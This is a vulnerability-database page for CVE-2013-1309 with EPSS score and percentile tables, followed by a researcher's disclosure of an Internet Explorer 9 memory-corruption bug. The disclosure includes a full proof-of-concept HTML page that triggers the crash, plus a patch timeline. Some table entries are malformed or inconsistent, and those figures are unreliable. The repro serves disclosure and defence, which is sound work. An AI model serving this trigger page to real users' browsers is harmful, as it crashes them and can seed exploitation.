CVE-2013-1309 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	66.72%	–	–
2023-03-12	–	–	–	95.51%	–
2023-04-02	–	–	–	94.64%	–
2023-08-20	–	–	–	94.08%	–
2023-10-08	–	–	–	94.38%	–
2023-12-03	–	–	–	95.01%	–
2024-02-04	–	–	–	95.18%	–
2024-04-07	–	–	–	94.89%	–
2024-06-02	–	–	–	94.89%	–
2024-06-09	–	–	–	94.95%	–
2024-12-22	–	–	–	95.29%	–
2025-01-19	–	–	–	95.29%	–
2025-03-18	–	–	–	–	30.08%
2025-03-18	–	–	–	–	30.08,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	99%
2023-03-12	99%
2023-04-02	99%
2023-08-20	99%
2023-10-08	99%
2023-12-03	99%
2024-02-04	99%
2024-04-07	99%
2024-06-02	99%
2024-06-09	99%
2024-12-22	1%
2025-01-19	1%
2025-03-18	96%
2025-03-18	96%

<!-- Source: http://blog.skylined.nl/20161207001.html Synopsis A specially crafted web-page can trigger a memory corruption vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability. Known affected software and attack vectors Microsoft Internet Explorer 9 An attacker would need to get a target user to open a specially crafted web-page. Java­Script does not appear to be required for an attacker to triggering the vulnerable code path. Details This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. The ZDI did do a more thorough analysis and provide some details in their advisory. I have included a number of reports created using a predecessor of Bug­Id below. Repro.html: --> <!doctype html> <html> <head> <script> window.onload=function(){location.reload();}; </script> </head> <body> <var> <img class="float" ismap="ismap" usemap="map"/> <map id="map"><area/></map> <dfn class="float"></dfn> <a class="float"></a> <input class="zoom"/> text </var> <q class="border float zoom" xml:space="preserve"> </q> </body> <style type="text/css"> .float { float:left; } .zoom { zoom:3000%; } .border::first-letter { border-top:1px; } </style> </html> <!-- Time-line 1 November 2012: This vulnerability was found through fuzzing. 2 November 2012: This vulnerability was submitted to ZDI. 19 November 2012: This vulnerability was acquired by ZDI. 4 February 2013: This vulnerability was disclosed to Microsoft by ZDI. 29 May 2013: Microsoft addresses this vulnerability in MS13-037. 7 December 2016: Details of this vulnerability are released. -->